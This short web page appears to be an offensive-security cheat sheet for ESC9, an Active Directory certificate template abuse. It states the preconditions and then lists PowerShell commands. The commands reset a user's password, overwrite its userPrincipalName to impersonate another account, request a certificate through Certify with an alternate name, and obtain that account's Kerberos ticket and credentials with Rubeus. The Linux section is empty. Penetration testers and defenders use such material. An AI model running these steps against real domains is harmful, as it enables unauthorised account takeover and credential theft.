Skip to main content

ESC9

To exploit ESC9, ensure the StrongCertificateBindingEnforcement key is not set to 2 or includes the UPN flag, the template has CT_FLAG_NO_SECURITY_EXTENSION, specifies client authentication, and the attacker has GenericWrite privilege on account A to compromise account B.

Windows

user2 Password Reset

PS /home/bobbuilder> Set-DomainUserPassword -Identity user2 -AccountPassword $((ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force)) -Verbose

Change user2 UPN to match user3 UPN

PS /home/bobbuilder> Set-DomainObject user2 -Set @{'userPrincipalName'='user3@minions.com'} -Verbose
Request a Certificate using ESC9 and alternative SAN user3
PS /home/bobbuilder> .\Certify.exe request /ca:<ca> /template:<template_name> /altname:user3

Convert certificate to PFX

Retrieving a TGT as user3
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap

Linux